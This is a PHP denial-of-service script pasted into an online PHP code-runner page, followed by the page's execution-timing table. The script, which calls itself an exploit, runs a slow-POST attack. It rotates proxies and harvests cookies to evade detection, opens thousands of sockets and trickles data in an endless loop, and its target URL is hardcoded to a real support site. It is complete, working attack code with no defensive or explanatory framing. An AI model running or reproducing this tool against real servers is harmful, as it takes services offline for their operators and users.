@ 2013-05-13T06:17:42Z <?php
set_time_limit(0);
ignore_user_abort(true);
$_SERVER['argv'][1] = 'http://support.ioncube.com/winapp/';
//-------------------------
// CONFiG
//-------------------------
$CONFIG['max_cookies'] = 20;
$CONFIG['max_sockets'] = 9001;
$CONFIG['timeout_ms'] = 500;
$CONFIG['usleep_time'] = 10;
//-------------------------
// INiT
//-------------------------
// Define EXPLOIT_VERSION
if(!defined('EXPLOIT_VERSION'))
define('EXPLOIT_VERSION', 'v1.9.2');
// Define STDIN
if(!defined('STDIN'))
define('STDIN', fopen('php://stdin', 'r'));
// Globals - DO NOT EDIT
$global_proxy_array = array();
//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------
/** Read STDIN and return it */
function readSTDIN() {
$file = STDIN;
if(!$file) return false;
return trim(fgets($file));
}
/** Receive a filename that has proxies listed in it and fills the $global_proxy_array */
function proxyLoadFile($filename) {
global $global_proxy_array;
// Load proxy list file
$filename = str_replace('\\', '/', $filename);
$content = @file_get_contents($filename);
if(!$filename || !$content) {
echo $filename.' is not a valid proxy-list file!';
exit(1);
}
$content = str_replace(array("\r\n", "\r"), "\n", $content);
$content = explode("\n", $content);
// Grab the proxies
foreach($content as $value) {
$tmp = explode(':', $value);
if(isset($tmp[0], $tmp[1])) {
$tmp[0] = trim($tmp[0]);
$tmp[1] = (int)(trim($tmp[1]));
// The proxy
$global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]);
}
}
}
/** Returns a random a proxy */
function proxyGetRandom() {
global $global_proxy_array;
// Give a random proxy
if(count($global_proxy_array)) {
$proxy = null;
while(!$proxy) {
$rand = mt_rand(0, count($global_proxy_array) - 1);
$proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null);
}
return $proxy;
}
return false;
}
/** Returns a random useragent */
function randomUserAgent() {
// Microsoft Windows versions
$os = array('5.0', '5.1', '5.2', '6.0', '6.1', '6.2');
// Select a random version
$os = $os[mt_rand(0, count($os) - 1)];
// Select a random browser
if(mt_rand(0, 1)) {
// Internet Explorer versions
$ua[0] = array('4.0', '7.0', '4.0');
$ua[1] = array('4.0', '8.0', '4.0');
$ua[2] = array('5.0', '9.0', '5.0');
$ua[3] = array('5.0', '10.0', '6.0');
// Random IE
$ua = $ua[mt_rand(0, count($ua) - 1)];
return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})";
} else {
// Mozilla Firefox versions
$ua = array('17.0', '18.0', '19.0', '20.0', '21.0');
// Random FF
$ua = $ua[mt_rand(0, count($ua) - 1)];
return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}";
}
}
/** Opens a custom socket and returns it */
function openCustomSocket($newEraUrl, $newEraProxy = null) {
global $CONFIG;
@ini_set('default_socket_timeout', 1);
$newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
$host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
$fp = @fsockopen($host, $newEraConnection->port);
if(!$fp)
return false;
stream_set_blocking($fp, 0);
stream_set_timeout($fp, 0, $CONFIG['timeout_ms']);
return $fp;
}
/**
* Receives a socket and performs the start of a slowPosting
* Returns Content-Length on success and false on failure
*/
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie) {
// Check the socket
if(!$sock)
return false;
// Generate a random Content-Length
$length = mt_rand(1337, 133700);
// Build
$header = 'POST '.($newEraProxy ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
$header .= 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
$header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
$header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
$header .= 'Content-Length: '.$length."\r\n";
$header .= "\r\n";
// Do it
@fwrite($sock, $header);
return $length;
}
/** Receives a socket and continues the slowPosting */
function slowPostContinue($sock, $bytes = 5) {
global $CONFIG;
// Check the socket
if(!$sock)
return false;
// Check the $bytes
if(intval($bytes) != $bytes)
$bytes = 5;
// Throttle execution speed slightly
if($CONFIG['usleep_time'] > 0)
@usleep($CONFIG['usleep_time']);
// Do it :D
$tmp = '';
for($j = 0; $j < $bytes; $j++)
$tmp .= chr(mt_rand(33, 126));
@fwrite($sock, urlencode($tmp));
return true;
}
//-------------------------
// CLASSES FOR THE LULZ
//-------------------------
/** I want cookies! Give me cookies! */
class NewEraCookies {
private $max_cookies;
private $cookies = array();
/** Constructor */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/** Object updater */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i = 0; $i < $this->max_cookies; $i++) {
// Using Proxy file?
if($proxyFile) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxyFile.' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/** Returns a cookie by its index */
public function returnCookieByIndex($idx) {
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies - 1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/** Function to parse set-cookie from header fields */
public static function cookieParse($header) {
$cookies = array();
foreach($header as $line) {
if(preg_match('/^Set-Cookie: /i', $line)) {
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$grabbed_cookie_data = false;
foreach($csplit as $data) {
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
if(!$grabbed_cookie_data) {
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$grabbed_cookie_data = true;
continue;
}
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) {
$cdata[$cinfo[0]] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/** Function to build the request cookie header from parsed set-cookie data */
public static function cookieBuild($data) {
if(is_array($data)) {
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/** Function to grab cookies from an url using PHP's fopen */
public static function cookieGrab($newEraUrl, $newEraProxy = null) {
// Build connection header
$header = 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
// Check proxy url
if($newEraProxy) {
// Enable proxy
$proxy_url = $newEraProxy->full_url;
$request_fulluri = true;
} else {
// Disable proxy
$proxy_url = '';
$request_fulluri = false;
}
// Build stream context
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
'timeout' => (3),
'header' => $header,
'proxy' => $proxy_url,
'request_fulluri' => $request_fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
'ssl' => array(
'verify_peer' => false
)
));
// Let the fun begin
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, $context);
// I hope this does work
if($handle) {
// If it worked, we grab the cookies
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
// Fun is only at a small distance
@fclose($handle);
}
return $cookie;
}
}
/** Class to construct and handle an url-like object */
class NewEraUrl {
private $host_full_url;
private $host_protocol;
private $host_ssl;
private $host_name;
private $host_port;
private $host_path;
/** Constructor */
public function __construct($host_full_url) {
$this->update_object($host_full_url);
}
/** Object updater */
public function update_object($host_full_url) {
$this->host_full_url = $host_full_url;
$this->host_ssl = ((strpos($this->host_full_url, 'https') === 0) ? true : false);
$this->host_protocol = ($this->host_ssl ? 'https' : 'http');
// Grab other parameters
$host_full_url = explode('/', $host_full_url, 4);
$host_full_url[2] = explode(':', $host_full_url[2], 2);
// Host, Port, Path
$this->host_name = $host_full_url[2][0];
$this->host_port = (isset($host_full_url[2][1]) ? $host_full_url[2][1] : ($this->host_ssl ? 443 : 80));
$this->host_path = '/'.(isset($host_full_url[3]) ? $host_full_url[3] : '');
}
/** Getter for the private properties */
public function __get($var) {
$var = 'host_'.$var;
if(isset($this->{$var}))
return $this->{$var};
}
/** Quick check to see if url is minimally valid */
public static function isValid($host_full_url) {
if(strpos($host_full_url, 'https://') === 0 || strpos($host_full_url, 'http://') === 0)
return true;
}
}
/** Class to construct and handle a proxy-like object */
class NewEraProxy {
private $proxy_full_url;
private $proxy_protocol;
private $proxy_ssl;
private $proxy_name;
private $proxy_port;
/** Constructor */
public function __construct($proxy_full_url) {
$this->update_object($proxy_full_url);
}
/** Object updater */
public function update_object($proxy_full_url) {
$this->proxy_full_url = $proxy_full_url;
$this->proxy_ssl = ((strpos($this->proxy_full_url, 'ssl') === 0) ? true : false);
$this->proxy_protocol = ($this->proxy_ssl ? 'ssl' : 'tcp');
// Grab other parameters
if(false !== ($tmp = strpos($proxy_full_url, '://')))
$proxy_full_url = substr($proxy_full_url, $tmp + 3);
$proxy_full_url = explode(':', $proxy_full_url);
// Host, Port, Path
$this->proxy_name = $proxy_full_url[0];
$this->proxy_port = (int)(isset($proxy_full_url[1]) ? $proxy_full_url[1] : ($this->proxy_ssl ? '443' : '80'));
}
/** Getter for the private properties */
public function __get($var) {
$var = 'proxy_'.$var;
if(property_exists($this, $var))
return $this->{$var};
}
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack
$url = null;
if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]))
$url = $_SERVER['argv'][1];
// Fetch proxy to use
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if(!empty($url) && isset($_SERVER['argv'][2])) {
if($proxy = explode(':', $_SERVER['argv'][2])) {
if(isset($proxy[0], $proxy[1])) {
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = (int)($proxy[1]);
unset($proxy[0], $proxy[1]);
}
}
if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) {
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy
if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && !$proxy['file']) {
$proxy['use'] = null;
while(!$proxy['use']) {
echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
$proxy['use'] = readSTDIN();
if(strpos(strtolower($proxy['use']), 'n') === 0) {
break;
} elseif(strpos(strtolower($proxy['use']), 'y') === 0) {
echo PHP_EOL.'Proxy IP: ';
$proxy['host'] = readSTDIN();
echo PHP_EOL.'Proxy Port: ';
$proxy['port'] = (int)(readSTDIN());
} elseif(strpos(strtolower($proxy['use']), 'f') === 0) {
echo PHP_EOL.'Proxy file: ';
$proxy['filename'] = readSTDIN();
if(is_readable($proxy['filename'])) {
$proxy['file'] = true;
} else {
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$proxy['use'] = null;
}
} else {
$proxy['use'] = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
}
}
unset($proxy['use']);
}
// Ask for target URL
while(!$url) {
echo PHP_EOL.'Target url: ';
$url = readSTDIN();
if(NewEraUrl::isValid($url)) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy suport
if(empty($proxy['host']) || empty($proxy['port'])) {
$newEraProxy = null;
if(!empty($proxy['file'])) {
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
} else {
$newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}
// Init the others
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], $proxy['file'], true);
// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
$fp = array();
// Do it
while(1) {
for($i = 0; $i < $CONFIG['max_sockets']; $i++) {
// Using Proxy file?
if($proxy['file']) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket
$tmp = array();
if($tmp['sock'] = openCustomSocket($newEraUrl, $newEraProxy)) {
// Progress bar
echo '.';
// Start a new slowPost and find its length
if($tmp['length'] = slowPostStart($tmp['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) {
if(isset($fp[$i], $fp[$i]['sock'])) {
// Close connection in the global socket array if it is being used
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
// Save the new socket in the global socket array
$fp[$i] = $tmp;
} else {
// Epic fail?
@fclose($tmp['sock']);
}
}
unset($tmp);
// Check the current sockets
foreach($fp as $k => $v) {
if($fp[$k]['length'] > 0) {
// Contine old slowPosts
$tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5;
slowPostContinue($fp[$k]['sock'], $tmp);
$fp[$k]['length'] -= $tmp;
} else {
// Close completed slowPosts
@fclose($fp[$k]['sock']);
unset($fp[$k]);
}
}
}
}
?>
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).
Version System time (s) User time (s) Memory (MiB) 8.3.6 1.209 0.792 18.80 8.3.5 1.123 0.880 22.01 8.3.4 1.163 0.840 19.29 8.3.3 1.099 0.902 19.76 8.3.2 1.256 0.746 20.76 8.3.1 1.222 0.779 23.89 8.3.0 1.205 0.795 21.26 8.2.18 1.179 0.822 17.00 8.2.17 1.211 0.789 22.96 8.2.16 1.221 0.784 22.38 8.2.15 1.175 0.826 24.18 8.2.14 1.136 0.866 24.66 8.2.13 1.238 0.778 26.16 8.2.12 1.183 0.820 20.98 8.2.11 1.196 0.806 22.30 8.2.10 0.978 1.022 18.34 8.2.9 0.669 1.332 19.72 8.2.8 0.629 1.372 18.00 8.2.7 0.696 1.306 18.13 8.2.6 0.637 1.366 18.05 8.2.5 0.702 1.297 18.25 8.2.4 0.663 1.340 20.32 8.2.3 0.672 1.328 18.69 8.2.2 0.686 1.315 18.24 8.2.1 0.608 1.389 18.62 8.2.0 0.620 1.383 18.19 8.1.28 1.165 0.836 25.92 8.1.27 1.169 0.832 24.23 8.1.26 1.232 0.769 26.35 8.1.25 1.159 0.842 28.09 8.1.24 1.173 0.830 24.14 8.1.23 1.035 0.972 19.29 8.1.22 0.579 1.421 18.05 8.1.21 0.669 1.332 18.77 8.1.20 0.649 1.334 17.85 8.1.19 0.683 1.319 17.75 8.1.18 0.636 1.365 18.10 8.1.17 0.636 1.364 18.84 8.1.16 0.752 1.248 22.50 8.1.15 0.643 1.359 19.04 8.1.14 0.636 1.365 17.82 8.1.13 0.787 1.218 18.45 8.1.12 0.613 1.390 17.99 8.1.11 0.696 1.305 17.92 8.1.10 0.659 1.342 17.92 8.1.9 0.669 1.332 17.90 8.1.8 0.579 1.421 17.88 8.1.7 0.746 1.256 17.72 8.1.6 0.641 1.366 18.14 8.1.5 0.670 1.333 18.03 8.1.4 0.627 1.377 17.94 8.1.3 0.619 1.381 18.00 8.1.2 0.600 1.402 18.02 8.1.1 0.623 1.378 17.97 8.1.0 0.533 1.468 18.01 8.0.30 0.680 1.324 18.77 8.0.29 0.679 1.321 17.25 8.0.28 0.649 1.352 18.84 8.0.27 0.677 1.327 17.70 8.0.26 0.601 1.406 17.57 8.0.25 0.680 1.323 17.38 8.0.24 0.560 1.443 17.42 8.0.23 0.639 1.362 17.38 8.0.22 0.613 1.388 17.29 8.0.21 0.620 1.383 17.32 8.0.20 0.643 1.360 17.47 8.0.19 0.543 1.458 17.33 8.0.18 0.663 1.339 17.32 8.0.17 0.636 1.366 17.31 8.0.16 0.581 1.425 17.35 8.0.15 0.572 1.428 17.46 8.0.14 0.673 1.330 17.26 8.0.13 0.676 1.325 14.05 8.0.12 1.496 0.442 17.35 8.0.11 1.447 0.494 17.26 8.0.10 1.511 0.450 17.39 8.0.9 1.518 0.419 17.39 8.0.8 1.349 0.593 17.39 8.0.7 1.473 0.464 17.25 8.0.6 1.561 0.394 17.30 8.0.5 1.491 0.440 17.24 8.0.3 1.509 0.450 17.38 8.0.2 1.461 0.392 17.44 8.0.1 1.522 0.412 17.28 8.0.0 1.468 0.491 17.26 7.4.33 0.646 1.355 15.33 7.4.32 0.683 1.319 16.82 7.4.30 0.573 1.430 16.74 7.4.29 0.589 1.412 16.87 7.4.28 0.583 1.419 16.67 7.4.27 0.636 1.365 16.74 7.4.26 0.591 1.405 16.81 7.4.25 1.425 0.508 16.95 7.4.24 1.454 0.481 16.96 7.4.23 1.383 0.564 17.01 7.4.22 1.345 0.598 16.88 7.4.21 1.327 0.615 16.85 7.4.20 1.532 0.419 16.95 7.4.16 1.486 0.468 16.95 7.4.15 1.420 0.525 17.40 7.4.14 1.448 0.508 17.86 7.4.13 1.449 0.509 16.94 7.4.12 1.434 0.534 16.96 7.4.11 1.517 0.511 16.93 7.4.10 1.577 0.496 16.86 7.4.9 1.518 0.553 16.88 7.4.8 1.422 0.514 19.39 7.4.7 1.312 0.621 16.87 7.4.6 1.309 0.638 16.92 7.4.5 1.463 0.454 16.81 7.4.4 1.482 0.538 16.85 7.4.3 1.384 0.613 16.92 7.3.33 0.562 1.437 13.81 7.3.32 0.565 1.433 13.71 7.3.31 1.495 0.463 16.70 7.3.30 1.442 0.497 16.86 7.3.29 1.356 0.579 16.75 7.3.28 1.394 0.536 16.82 7.3.27 1.497 0.457 17.40 7.3.26 1.497 0.469 16.81 7.3.25 1.465 0.490 16.79 7.3.24 1.495 0.457 16.93 7.3.23 1.585 0.453 16.82 7.3.21 1.546 0.499 16.91 7.3.20 1.404 0.575 19.39 7.3.19 1.134 0.490 16.91 7.3.18 1.443 0.590 16.96 7.3.17 1.432 0.579 16.87 7.3.16 1.362 0.659 16.80 7.2.33 1.564 0.477 17.22 7.2.32 1.119 0.395 16.91 7.2.31 1.433 0.569 16.95 7.2.30 1.380 0.605 16.84 7.2.29 1.446 0.534 17.04 7.2.10 1.142 0.318 15.07 7.1.22 1.104 0.447 14.18 5.6.38 1.061 0.364 14.58
preferences:dark mode live preview
39.38 ms | 401 KiB | 5 Q